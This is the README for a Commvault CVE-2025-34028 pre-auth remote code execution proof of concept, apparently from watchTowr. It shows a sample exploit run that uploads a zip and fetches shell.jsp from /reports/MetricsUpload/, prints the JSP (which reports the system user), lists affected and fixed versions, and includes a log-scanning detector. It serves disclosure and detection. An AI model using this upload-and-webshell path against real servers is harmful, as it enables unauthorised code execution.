# CVE-2025-34028
A Commvault Pre-Authenticated Remote Code Execution Proof of Concept
See our [blog post](https://labs.watchtowr.com/) for technical details.
# Detection in Action
```
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr (sonny@watchTowr.com)
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
```
# Description
This script is a proof of concept for CVE-2025-34028, which affects Commvault web interfaces. It uploads a zip file containing a code-execution .jsp file to a public-facing directory, and the system user is reported in the response. More details are in our [blog post](https://labs.watchtowr.com/).
# Note
The PoC script uses a hardcoded zip file containing the following files:
* /ccApp/index.html
* shell.jsp
`shell.jsp` contents:
```
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
```
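To check web access logs for the request pattern visible in the PoC output above (a `.jsp` fetched from under `/reports/MetricsUpload/`), the following added example scans log lines for it; it is not part of the watchTowr PoC. It assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption: access logs are in Combined Log Format; adapt LOG_RE otherwise.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Any JSP/JSPX below the upload directory shown in the PoC output.
SUSPECT_RE = re.compile(r'^/reports/metricsupload/.+\.jspx?$', re.IGNORECASE)


def normalise(target):
    """Drop the query, decode %-escapes twice, strip ;params and extra slashes."""
    path = urlsplit(target).path
    for _ in range(2):  # second pass catches double encoding (%252e)
        path = unquote(path)
    path = re.sub(r';[^/]*', '', path)  # e.g. ;jsessionid=...
    return re.sub(r'/{2,}', '/', path)


def find_suspect_requests(lines):
    """Return one dict per logged request for a JSP under /reports/MetricsUpload/."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise(m['target'])
        if SUSPECT_RE.match(path):
            hits.append({'ip': m['ip'], 'time': m['ts'], 'path': path,
                         # a 2xx status means the server served the file
                         'served': m['status'].startswith('2')})
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/May/2025:10:00:01 +0000] "GET /reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp HTTP/1.1" 200 153',
    '203.0.113.7 - - [01/May/2025:10:00:05 +0000] "GET /reports/MetricsUpload/AbCd1234/.tmp/dist-cc/dist-cc/shell%2Ejsp;jsessionid=1?x=1 HTTP/1.1" 404 0',
    '198.51.100.9 - - [01/May/2025:10:01:00 +0000] "GET /reports/index.jsp HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/May/2025:10:02:00 +0000] "POST /reports/MetricsUpload/report.xml HTTP/1.1" 200 12',
]

if __name__ == '__main__':
    for hit in find_suspect_requests(SAMPLE):
        print(hit)
```

Hits with `served` set to true deserve priority review, since the server returned content for a JSP inside the upload directory.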
# Affected Versions
* Commvault Windows and Linux 11.38.0 - 11.38.19
# Remediated Versions
* Commvault Windows and Linux 11.38.20 as of April 10, 2025
* Commvault Windows and Linux 11.38.25 as of April 10, 2025
More details are in the [Commvault Advisory](https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html).
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team:
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File snapshot
[4.0K] /data/pocs/70b83bd749c7d62a08d869c66976c2eba5562e76
├── [2.4K] README.md
└── [3.7K] watchtowr-vs-commvault-rce-CVE-2025-34028.py
0 directories, 2 files